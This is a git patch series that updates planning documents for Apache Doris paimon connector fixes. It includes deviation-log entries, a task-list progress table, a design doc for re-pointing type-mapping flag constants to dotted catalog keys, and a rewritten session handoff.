`getCatalog().getEnableMappingVarbinary()` 读点分(`HMSExternalTable:791`/`IcebergUtils:1083`)→ 翻闸回归。**用户签 [D-051] = 本轮只修 paimon**(保 commit surgical、单任务);**follow-up(close 时)**:hive+iceberg 两常量重指 canonical 点分键(hive `binary_as_string` token 复原为 `varbinary`,**勿**反转 boolean)+ 各加 dotted-key honor UT;与 paimon #5 同形修。scope 经验证 workflow `wf_a3626c54-0db`(g5 + synthesizer,静态 trace 未 live) | [task-list #5](./task-list-P5-rereview2-fixes.md) / [P5-fix-MAPPING-FLAG-KEYS 设计](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) / [D-051](./decisions-log.md) | 2026-06-11 | 🟡 待修(跨连接器 follow-up,用户定本轮 paimon-only)| | DV-028 | P5-fix#4 FIX-JDBC-DRIVER-URL:driver_url 安全校验**仅 CREATE CATALOG**(`PaimonConnector.preCreateValidation`→`ConnectorValidationContext.validateAndResolveDriverPath`),**FE-restart reload / ALTER CATALOG / scan-time 不复校**——与 legacy 分歧(legacy `getBackendPaimonOptions`→`JdbcResource.getFullDriverUrl` 每 scan 复校 format/whitelist/secure-path)。根因 = pre-existing **fe-core 架构缝**、非本 fix/非 paimon 专属:`CatalogFactory:164` replay(`isReplay=true`) 跳 `checkWhenCreating`→`preCreateValidation` 不跑;`PluginDrivenExternalCatalog.checkProperties`(ALTER 路) 只调 `validateProperties`(无 driver 校验)、不调 `preCreateValidation`;`getBackendPaimonOptions` 仅 resolve 不 validate(连接器 scan-time 只有 `ConnectorContext`、无 driver-path 校验 hook)。**与 JDBC 参考连接器 `JdbcDorisConnector` 完全 parity**(其亦 CREATE-time-only)。**用户定接受**([D-050]):默认配置 permissive(`secure_path="*"`/whitelist 空)无可绕,唯一暴露 = 硬化部署后**收紧** whitelist/secure-path 又**不重建** catalog。**复评/follow-up(跨连接器)**:若需 close,须 fe-core 改(ALTER 路 `checkProperties`→`preCreateValidation`,注意会触发 JDBC 连接器的 BE 连通测)+ scan-time 校验须新 `ConnectorContext` SPI hook——影响全 plugin 连接器、独立工单 | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(CREATE-time parity,用户接受+跨连接器 follow-up)| | DV-029 | P5-fix#4 FIX-JDBC-DRIVER-URL 两 scope-out(surgical):① 连接器 `PaimonCatalogFactory.resolveDriverUrl` 是 legacy `JdbcResource.getFullDriverUrl` 的**简化子集**——只做 scheme 解析(裸名→`file://{jdbc_drivers_dir}/{name}`),**不**做文件存在性 / legacy 旧 `jdbc_drivers/` 回退 / 云下载。常见情形(`mysql.jar`+默认 dir)两者等价;仅装旧 dir 的 jar 会 BE 找不到(pre-existing 简化、FE 注册路本就如此、复用未改)。② **BE-side `paimon.jdbc.{user,password,uri}` 别名丢弃不修**——同 `startsWith("jdbc.")` filter 也丢这些别名键,但 **BE 不需要**:`PaimonJniScanner.initTable` 从 `serialized_table` 反序列化整表、**不**从 options_json 重建 JdbcCatalog;BE 唯一消费 jdbc 选项处 `PaimonJdbcDriverUtils.registerDriverIfNeeded` 只读 driver_url/driver_class。legacy `getBackendPaimonOptions` 亦仅发 driver_url+driver_class(窄)。故 B-8a 只修 driver_url/class 即 parity(scope-critic lens LGTM 确认) | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(surgical scope-out,BE 经 trace 确认安全)| | DV-027 | P5-fix#3 FIX-SCHEMA-EVOLUTION:history_schema_info 用 **eager 全量** `SchemaManager.listAllIds()`+`schema(id)`(每 scan、**无 cache**),非 legacy 的 per-split 引用 schema 懒读+缓存(`PaimonScanNode.putHistorySchemaInfo`→`PaimonUtils.getSchemaCacheValue`)。理由:Design C 的 scan 级缝 `populateScanLevelParams` 拿不到 split 集(那是 `planScan` 才有),故无法只读引用到的 schema;listAllIds() 全集**保证**覆盖任意 native 文件的 `schema_id`(BE `table_schema_change_helper.h:259-263` 缺 entry 会 fail-loud `InternalError`,全集即杜绝)。**两点接受**:① perf——K 个 schema 版本= K 次小 JSON 读/scan(props 每 node 缓存一次、非 per-split);② 鲁棒性微回归——某**未被引用**的 schema-N JSON 瞬时不可读会令本 scan 失败(fail-loud 传播,镜像 legacy `putHistorySchemaInfo` 不吞异常),而 legacy 因只读引用 schema 不碰它、可完成。correctness-safe(全集是 legacy 引用集的超集、绝不触发 BE InternalError);review 评 MINOR。未来优化=引用集(需 split-aware 缝)或连接器侧 cache | [task-list #3](./task-list-P5-rereview2-fixes.md) / [P5-fix-SCHEMA-EVOLUTION 设计](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) / [D-049](./decisions-log.md) | 2026-06-11 | 🟢 已登记(MINOR perf+鲁棒性,接受 fail-loud)| diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 3aabcf370a800c..67d05f3bf96a80 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -27,7 +27,7 @@ | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | -| 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | +| 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | 🔄 | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | diff --git a/plan-doc/tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md b/plan-doc/tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md new file mode 100644 index 00000000000000..4c98285415faaf --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md @@ -0,0 +1,78 @@ +# P5-fix #5 — FIX-MAPPING-FLAG-KEYS (M-crit, MAJOR) + +> Finding: `reviews/P5-paimon-rereview2-2026-06-11.md` M-crit (critic-surfaced; **re-verified independently** before this design — see "Re-confirmation" below). +> Scope decision: **paimon-only** + cross-connector follow-up logged ([D-051], [DV-030]). User-signed 2026-06-11. + +## Problem + +The paimon connector's two type-mapping toggles are **silently dead**: even when the user enables them at `CREATE CATALOG`, the connector never honors them. + +- `enable.mapping.varbinary=true` → Paimon `BINARY`/`VARBINARY` columns should map to Doris `VARBINARY`; instead they stay `STRING`. +- `enable.mapping.timestamp_tz=true` → Paimon `TIMESTAMP_WITH_LOCAL_TIME_ZONE` (LTZ) should map to Doris `TIMESTAMPTZ`; instead it stays `DATETIMEV2`. + +This is a **cutover regression**: the legacy in-tree paimon path honors both flags. + +## Root Cause + +A transcription drift introduced during the SPI cutover. fe-core writes/reads **dotted** catalog keys; the connector reads **underscore** keys that are never present in the property map. + +- The canonical user-facing CREATE-CATALOG keys are **dotted**: `enable.mapping.varbinary` / `enable.mapping.timestamp_tz` (`CatalogProperty.java:50,52`). `ExternalCatalog.setDefaultPropsIfMissing():302-306` writes **only** those dotted keys (default `false`); `HIDDEN_PROPERTIES` hides them; the legacy paimon/hive/iceberg paths and the JDBC connector all read the dotted keys. +- `PluginDrivenExternalCatalog.createConnectorFromProperties():143-151` hands the connector the **raw** `catalogProperty.getProperties()` map — which therefore contains only the dotted keys (`getProperties()` is a verbatim copy, `CatalogProperty.java:100-101`). +- The connector reads **underscore** keys (`PaimonConnectorProperties.java:39,42` → `PaimonConnectorMetadata.buildTypeMappingOptions:1017-1027`): `enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`. Those keys are never in the map → `getOrDefault(..., "false")` returns `false` unconditionally → flags permanently off. +- The binary key is **doubly** drifted: not only `.`→`_` but the token was renamed `varbinary`→`binary_as_varbinary`. A generic dots→underscores normalizer would still miss it. + +No normalization layer exists anywhere between the catalog property map and the connector read (verified by grep across `fe/`). The underscore keys legitimately exist only in `FileFormatConstants` for the **TVF** path (`hdfs()`/`s3()` functions) — a different namespace, the likely copy-paste source. + +### Re-confirmation (M-crit was critic-surfaced, not 3-lens-gated) + +Independent 5-angle scout + adversarial synthesizer (workflow `wf_a3626c54-0db`) → **REAL_BUG, high confidence**, false-positive steelman rejected: +- Canonical key is dotted, proven by original feature PRs `c1eaede1260` (#57821), `a22da676bb0` (#59720); by every regression `CREATE CATALOG` (paimon/iceberg/hive/jdbc all use dotted — e.g. `test_paimon_catalog_timestamp_tz.groovy:26-32`, `.out:4` expects `timestamptz(3)`); by legacy parity (`PaimonExternalTable.java:350`); and by the JDBC connector (migrated in the **same** SPI PR) correctly keeping dotted (`JdbcConnectorProperties.java:66-67`). +- Failure manifests end-to-end (no normalization; single read site at ctor line 88). +- **Cross-connector**: NEW hive (`enable_mapping_binary_as_string` — a misnomer, not a semantic inversion) and iceberg (`enable_mapping_varbinary`) share the identical class of bug. **Out of scope here** ([DV-030]). + +### Why this is FE-only (no BE, no SPI) + +The **BE scan-param** side already reads the dotted key: `PluginDrivenScanNode extends FileQueryScanNode` and does **not** override `getEnableMappingVarbinary()/getEnableMappingTimestampTz()`, which read the dotted catalog getter and feed `params.setEnableMappingVarbinary/Tz` (`FileQueryScanNode.java:192-193,635-678`). Today the FE column-type side (connector) and the BE scan-param side **diverge** when the flag is set; re-pointing the connector's read to the dotted key makes both consistent again. No BE change; no new/changed SPI surface (the connector already receives the raw catalog map and already has the read site — only the key literals change). + +## Design + +Re-point the two connector constants to the **canonical dotted catalog keys**, fixing both the separator and (for binary) the renamed token, and align the binary constant name with the cross-connector convention (`CatalogProperty`/`Jdbc`/`Iceberg` all use `ENABLE_MAPPING_VARBINARY`). + +`PaimonConnectorProperties.java`: +- `ENABLE_MAPPING_BINARY_AS_VARBINARY = "enable_mapping_binary_as_varbinary"` → **`ENABLE_MAPPING_VARBINARY = "enable.mapping.varbinary"`** +- `ENABLE_MAPPING_TIMESTAMP_TZ = "enable_mapping_timestamp_tz"` → **`ENABLE_MAPPING_TIMESTAMP_TZ = "enable.mapping.timestamp_tz"`** + +`PaimonConnectorMetadata.buildTypeMappingOptions` (the single usage site): update the constant reference `ENABLE_MAPPING_BINARY_AS_VARBINARY` → `ENABLE_MAPPING_VARBINARY`. **No logic change** — the `Options(mapBinaryToVarbinary, mapTimestampTz)` arg order is already correct (binary first), and the read order is unchanged. + +### Why this approach (vs fe-core normalizer) + +Rejected: a dots→underscores normalizer in `PluginDrivenExternalCatalog.createConnectorFromProperties`. It is **broader-blast** (mutates the shared map all connectors + image/replay/SHOW CREATE see), would **break JDBC** (already reads dotted), and is **insufficient** (paimon's renamed token would still be missed). The constant re-point is the minimal, parity-correct fix and converges paimon with the JDBC/legacy dotted convention. + +## Implementation Plan + +1. `PaimonConnectorProperties.java:38-42` — rename + re-value the two constants (with clarifying Javadoc that these are the canonical dotted CREATE-CATALOG keys mirroring `CatalogProperty`). +2. `PaimonConnectorMetadata.java:~1020` — update the one constant reference. +3. Add fail-before/pass-after UTs (below). + +## Risk Analysis + +- **Blast radius**: two string literals + one reference, single connector. No SPI, no BE, no fe-core. +- **Behavior change is intended and parity-restoring**: only catalogs that **set** the flag change (latent until enabled — default `false` renders identically to before, so default-config catalogs are unaffected). +- **Misnamed-constant trap avoided**: do NOT invert any boolean (hive's `binary_as_string` is a misnomer, but that is out of scope here anyway). +- **No existing test pins the broken behavior** (verified) → no test churn beyond the net-new coverage. + +## Test Plan + +### Unit Tests (`PaimonConnectorMetadataTest.java`, offline harness) + +Build a `FakePaimonTable` whose `RowType` has a `BINARY` and a `TIMESTAMP_WITH_LOCAL_TIME_ZONE` column; drive `getTableHandle` → `getTableSchema` and assert the mapped `ConnectorType` names. + +1. **Bug-catcher** (`...HonorsDottedMappingKeys`): construct the metadata with `{"enable.mapping.varbinary":"true","enable.mapping.timestamp_tz":"true"}` → assert BINARY→`VARBINARY` and LTZ→`TIMESTAMPTZ`. + - *Fail-before* (underscore constants): both flags read `false` → `STRING` / `DATETIMEV2` → assertions red. *Pass-after*: green. +2. **Default guard** (`...DefaultsMappingFlagsOff`): construct with no mapping keys → assert BINARY→`STRING` and LTZ→`DATETIMEV2` (default-off preserved). Green both states — guards against accidentally flipping defaults. + +Each test documents WHY (the dotted catalog key is the user-facing contract fe-core sets/hides/defaults; reading the underscore key silently drops the flag) and the MUTATION that reddens it. + +### E2E Tests + +`test_paimon_catalog_varbinary.groovy` / `test_paimon_catalog_timestamp_tz.groovy` (the `.out` expects `timestamptz(3)`) already encode the dotted-key contract — but are **CI-gated** (`enablePaimonTest=false` in committed HEAD + external Paimon/HDFS fixture). Note as gated; do not claim to run them. From 58431713519b16e66db444bf5237789e48f2ed69 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 21:45:17 +0800 Subject: [PATCH 023/128] docs: checkpoint #5 FIX-MAPPING-FLAG-KEYS done; hand off #6 FIX-KERBEROS-DOAS - task-list #5 commit-cell filled with 9dcf6d1a9e5 - HANDOFF rewritten: #5 summary + #6 next (two scope questions for the user) Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 64 +++++++++++++----------- plan-doc/task-list-P5-rereview2-fixes.md | 2 +- 2 files changed, 35 insertions(+), 31 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 592f43fae9d59d..b948701949e318 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,31 +5,35 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#4 已完成 → 从 #5 起)** +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1~#5 已完成 → 从 #6 起)** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 -## ✅ 已完成(P0 BLOCKER 全清) +## ✅ 已完成(P0 BLOCKER 全清 + P1 #5) - **#1 `FIX-URI-NORMALIZE`**(B-7DF/DV)`20b19d19dd8` —— native 数据文件 + DV 路径 scheme 归一化。新 SPI `ConnectorContext.normalizeStorageUri`。 - **#2 `FIX-STATIC-CREDS-BE`**(B-9)`d23d5df9914` —— 静态 object-store 凭据→BE canonical `AWS_*`。新 SPI `ConnectorContext.getBackendStorageProperties`。 - **#3 `FIX-SCHEMA-EVOLUTION`**(B-1a;M-10 deferred)`667f779af04` —— 连接器直建 thrift schema 字典(Design C,零新 SPI)。 -- **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7`(本 session)—— 见下。 - -### #4 摘要(本 session)`FIX-JDBC-DRIVER-URL` —— commit `2d15b1b7ed7` -- **根因**:JDBC flavor 连接器(B-8a 功能 BLOCKER)`PaimonScanPlanProvider.getBackendPaimonOptions` 把 `driver_url` **裸**转发 BE 且 `startsWith("jdbc.")` filter 丢 `paimon.jdbc.*` 别名 → BE `JdbcDriverUtils.registerDriver` 的 `new URL("mysql.jar")` 抛 `MalformedURLException`;(B-8b 安全)driver_url 无 format/whitelist/secure-path 校验 + stale「paimon 不在 SPI_READY_TYPES」注释(B7 后已假)。 -- **修(纯连接器、零新 SPI,复用既有 hook)**:B-8a = `getBackendPaimonOptions` 用 `firstNonBlank(JDBC_DRIVER_URL)` 认两别名 + 抽出共享 `PaimonCatalogFactory.resolveDriverUrl(driverUrl, env)`(FE 注册与 BE 选项同解析)发 canonical `jdbc.driver_url`(resolved)+`jdbc.driver_class`(镜像 legacy `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions`)。B-8b = override `PaimonConnector.preCreateValidation` 对 jdbc flavor 调既有 `ConnectorValidationContext.validateAndResolveDriverPath`(镜像 `JdbcDorisConnector`)+ 删 stale 注释。 -- **scout(5-agent)+4-lens clean-room review**:B-8a + CREATE-time B-8b 确认正确;review 揪出**校验仅 CREATE-time**(FE-restart reload / ALTER CATALOG / scan-time 不复校)= pre-existing fe-core 缝、全 plugin 连接器共有(含 JDBC 参考连接器)、默认配置 permissive 无可绕。**用户签 [D-050] 接受 CREATE-time parity**(vs 扩 fe-core+SPI)→ 登 [DV-028](gap+跨连接器 follow-up)+ [DV-029](简化 resolver + BE-side `paimon.jdbc.{user,password,uri}` 别名 out-of-scope,因 BE 从 `serialized_table` 反序列化整表、只 `registerDriverIfNeeded` 读 driver_url/class)。 -- **验证**:模块 **232/0/0**(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before 5/9 新测向红**。e2e `test_paimon_jdbc_catalog` **CI-gated(未跑)**。设计 [`P5-fix-JDBC-DRIVER-URL-design.md`](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md)、RFC §24(无新 SPI)、[D-050]、[DV-028]/[DV-029]。 - -## 🔜 下一个 session:从 **#5 `FIX-MAPPING-FLAG-KEYS`** 起,按 task-list 顺序续修(已进入 P1 MAJOR) -> ⚠️ **M-crit 是 critic-surfaced、未过 3-lens** → **动手前先独立复核 dotted-vs-underscore key 事实**(grep `enable_mapping`、`enable.mapping`、`setDefaultPropsIfMissing`)。⚠️ **行号可能已漂移**(#3/#4 改过 `PaimonScanPlanProvider`/`PaimonConnector`,但 #5 主要在 `PaimonConnectorProperties`/`PaimonConnectorMetadata`/`PaimonTypeMapping`)—— **先拿当前代码复核 finding**。 - -**#5 `FIX-MAPPING-FLAG-KEYS`(M-crit,MAJOR,纯连接器/FE-wiring,无 BE)**: -- **现象**:连接器读**下划线**键 `enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`;但 FE/legacy 设的是**点分**键 `enable.mapping.varbinary` / `enable.mapping.timestamp_tz` → flag 永 false → 即便用户开启 mapping,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(类型映射静默失效)。 -- **连接器**:`PaimonConnectorProperties.java:39,42`;读 `PaimonConnectorMetadata.java:1017-1027`;消费 `PaimonTypeMapping.java:130-165`。**legacy**:`CatalogProperty.java:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306`;`PaimonUtil.paimonPrimitiveTypeToDorisType:253,257,283-286`。 -- **Fix sketch**:读 FE 实际设的**点分**键(并核对被重命名的 `varbinary` 键),或在 `PluginDrivenExternalCatalog.createConnectorFromProperties` 构造连接器前把 dots→underscores 归一化。注意核对 `enable.mapping.varbinary`(legacy) vs `enable_mapping_binary_as_varbinary`(连接器) 的**键名本身**也不一致(不只是分隔符)。 -- **SPI?=no**(纯连接器/FE-wiring)。**测**:UT 用 `{"enable.mapping.timestamp_tz":"true"}` 构造连接器 → 断言 LTZ 列映射到 TIMESTAMPTZ(闭合 critic coverage-gap #2);同理 binary→varbinary。 +- **#4 `FIX-JDBC-DRIVER-URL`**(B-8a + B-8b)`2d15b1b7ed7` —— driver_url resolve+别名+CREATE-time 校验(纯连接器,零新 SPI;[D-050]/[DV-028]/[DV-029])。 +- **#5 `FIX-MAPPING-FLAG-KEYS`**(M-crit;本 session)`9dcf6d1a9e5` —— 见下。 + +### #5 摘要(本 session)`FIX-MAPPING-FLAG-KEYS` —— commit `9dcf6d1a9e5` +- **根因**:翻闸后 paimon 连接器类型映射两开关**静默失效**——连接器读**下划线**键 `enable_mapping_binary_as_varbinary`/`enable_mapping_timestamp_tz`(`PaimonConnectorProperties:39,42`→`PaimonConnectorMetadata.buildTypeMappingOptions`),但 fe-core 只写**点分** catalog 键 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz`(`CatalogProperty:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306` 仅写点分;`HIDDEN_PROPERTIES` 仅藏点分),`createConnectorFromProperties` 把**原始** catalog map 原样喂连接器 → `getOrDefault(下划线,"false")` 恒 false → 用户即便开启,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(legacy `PaimonExternalTable:350` 读点分 honor → cutover 回归,flag 启用前 latent)。binary 键**双重漂移**(分隔符+token `varbinary`→`binary_as_varbinary`),通用归一化器修不了。 +- **复核(M-crit 未过 3-lens → 动手前先独立复核,已做)**:5-agent scout + 对抗 synthesizer(workflow `wf_a3626c54-0db`)→ **REAL_BUG high-conf**,false-positive steelman 被否(原始 feature PR #57821/#59720、全 regression CREATE CATALOG 皆点分、legacy parity、同 SPI PR 的 JDBC 连接器正确保点分均证点分为 canonical)。 +- **修(纯连接器、零 SPI、无 BE)**:`PaimonConnectorProperties` 两常量重指 canonical 点分键(binary 常量并改名 `ENABLE_MAPPING_VARBINARY` 对齐 CatalogProperty/JDBC/iceberg;同修分隔符+token)+ 更新 `PaimonConnectorMetadata` 一处引用;`Options(mapBinaryToVarbinary,mapTimestampTz)` 顺序本就对、无逻辑改。**BE 一致性已核**:`PluginDrivenScanNode extends FileQueryScanNode` 不 override mapping getter → BE scan param 经继承的 `getEnableMappingVarbinary/Tz` 本就读点分(`FileQueryScanNode:192-193,635-678`),修后 FE 列型与 BE scan param 一致(修前两侧分歧)。否决 fe-core 归一化器(blast 大/破 JDBC/对双重漂移不足)。 +- **作用域 = paimon-only(用户签 [D-051])**:⚠️ **新 hive + iceberg 连接器同根因**(读下划线、fe-core 只写点分)——本轮不修,登 [DV-030] 跨连接器 follow-up(iceberg `enable_mapping_varbinary` 仅分隔符差;hive `enable_mapping_binary_as_string` 是**误名非语义反转**,`HmsTypeMapping:90-93` true→VARBINARY,**勿**反转 boolean)。 +- **验证**:模块 **234/0/0**(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before bug-catcher 向红**(期望 `` 实得 ``)+ guard 两态绿。e2e `test_paimon_catalog_{varbinary,timestamp_tz}.groovy` **CI-gated(未跑)**(`enablePaimonTest=false` + 外部 fixture;`.out` 期望 `timestamptz(3)`)。设计 [`P5-fix-MAPPING-FLAG-KEYS-design.md`](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md)、[D-051]、[DV-030]、无 SPI 改(RFC 无须改)。 + +## 🔜 下一个 session:从 **#6 `FIX-KERBEROS-DOAS`** 起,按 task-list 顺序续修 +> ⚠️ **先拿当前代码复核 finding**(review 只读,行号可能漂移;#3/#4/#5 改过 `PaimonScanPlanProvider`/`PaimonConnector`/`PaimonConnectorProperties`/`PaimonConnectorMetadata`,但 #6 主要在 `PaimonConnector`/`PaimonCatalogOps`/`PluginDrivenExternalCatalog`)。 +> ⚠️ **两处需用户定 scope**(动手前问):① **D7=B 读-vs-DDL 不对称**——round-1 D7 故意只在 4 个 DDL op 包 `executeAuthenticated`、read 路径不包;M-11 要求把 partition-listing **read** RPC 也包 `doAs`——**确认是否要把 read 也包**(改变 D7 的故意不对称)。② **M-8 的「DLF」从句 review 自认 overstated**(DLF 继承 no-op authenticator)——**先核实**再决定范围。 + +**#6 `FIX-KERBEROS-DOAS`(M-8 + M-11,MAJOR,secured HMS/HDFS 部署;SPI=maybe)**: +- **M-8**:Kerberized HDFS 上 filesystem/jdbc flavor 的 fs/jdbc op 丢 `doAs`(`initializeCatalog` 在翻闸路径 dead;HMS flavor 不受影响)。 +- **M-11**:MTMV / SHOW PARTITIONS / partitions-TVF 的分区枚举在 Kerberos HMS 上跑 `listPartitions` RPC **不包** `doAs`。 +- **连接器**:`PaimonConnector.java:124-196`(M-8);`PaimonCatalogOps.java:249-251`、`PaimonConnectorMetadata.java:892-894`(M-11)。**fe-core**:`PluginDrivenExternalCatalog.java:122-137,150`;`PluginDrivenMvccExternalTable.java:157`;`PluginDrivenExternalTable.java:317-318`。 +- **legacy parity**:`PaimonFileSystemMetaStoreProperties.java:40-57`、`PaimonJdbcMetaStoreProperties.java:111-135`(M-8);`PaimonExternalCatalog.java:96-118`(`executionAuthenticator.execute` wrap)、`metacache/paimon/PaimonPartitionInfoLoader.java:49`(M-11)。 +- **Fix sketch**:把 fs/jdbc HDFS authenticator 接到 live(连接器)create 路径;分区枚举 read RPC 包 `executeAuthenticated`。Scope = secured HMS/HDFS 部署。真值闸=live Kerberos e2e(CI-gated)。 每条遵循项目既定 per-fix 流程(`step-by-step-fix` skill):1) 设计 doc → `plan-doc/tasks/designs/P5-fix--design.md`;2) **先拿当前代码复核 finding**;3) 实现(minimal、surgical、**连接器禁 import fe-core**);4) build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、加 fail-before/pass-after UT);5) **独立 commit**;6) SPI 改动登 `01-spi-extensions-rfc.md`、用户签字入 `decisions-log.md`、偏差入 `deviations-log.md`、同步 task-list。 @@ -38,35 +42,35 @@ | 层 | 条目 | 说明 | |---|---|---| | **P0 BLOCKER(挡 commit)** | ✅1.URI-NORMALIZE · ✅2.STATIC-CREDS-BE · ✅3.SCHEMA-EVOLUTION · ✅4.JDBC-DRIVER-URL | **全清** | -| **P1 MAJOR(修或显式接受)** | **⬜5.`FIX-MAPPING-FLAG-KEYS`(M-crit)** · 6.`FIX-KERBEROS-DOAS`(M-8+M-11) · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | #5 critic-surfaced、**未过 3-lens→先复核** dotted-vs-underscore key 事实;M-8/M-11 同属 UGI `doAs` 缺失。 | +| **P1 MAJOR(修或显式接受)** | ✅5.`FIX-MAPPING-FLAG-KEYS`(M-crit) · **⬜6.`FIX-KERBEROS-DOAS`(M-8+M-11)** · 7.`FIX-FORCE-JNI-SCANNER`(M-1) | #5 已修(paimon-only,hive/iceberg 同根因登 [DV-030]);#6 两处需先定 scope(D7 读-vs-DDL 不对称 + M-8「DLF」从句 overstated)。 | | **P2 严重度有争议(perf;R1=MINOR)** | 8.`FIX-COUNT-PUSHDOWN`(M-2) · 9.`FIX-NATIVE-SUBSPLIT`(M-3) | 结果正确仅性能/并行。**动手前先找用户定 scope**(accept-or-defer,defer 则登 `deviations-log`)。 | -| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · **#4 跨连接器 follow-up(CREATE-time-only 校验,见 [DV-028])** | critic 标本轮未追;查出真分歧才转 FIX。 | +| **P3 覆盖缺口(去查)** | 复验 `FIX-HMS-CONFRES` · DDL 写路径 parity · ANALYZE/列统计 · split-count 计账 · #4 跨连接器 follow-up([DV-028])· **#5 跨连接器 follow-up(hive+iceberg mapping-flag 键,[DV-030])** | critic 标本轮未追;查出真分歧才转 FIX。 | | **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 | --- # 📦 仓库状态 -- **HEAD = `2d15b1b7ed7`**(`fix: FIX-JDBC-DRIVER-URL`,本 session #4;checkpoint docs commit 紧随)。该 fix commit = #4 连接器码(main+test)+设计 doc+D-050+DV-028/029+RFC §24+task-list 进度(10 文件,无 regression-conf/scratch)。 -- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#4 commit-cell 填 hash)。 +- **HEAD = `9dcf6d1a9e5`**(`fix: FIX-MAPPING-FLAG-KEYS`,本 session #5;checkpoint docs commit 紧随)。该 fix commit = #5 连接器码(main+test)+设计 doc+D-051+DV-030+task-list 进度(7 文件,无 regression-conf/scratch)。 +- **本 checkpoint commit 改动**:`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#5 commit-cell 填 hash)。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:…→`667f779af04`(#3 SCHEMA-EVOLUTION)→`2d15b1b7ed7`(#4 JDBC-DRIVER-URL, HEAD)。 +- 迁移链:…→`667f779af04`(#3)→`2d15b1b7ed7`(#4)→`9dcf6d1a9e5`(#5 MAPPING-FLAG-KEYS, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 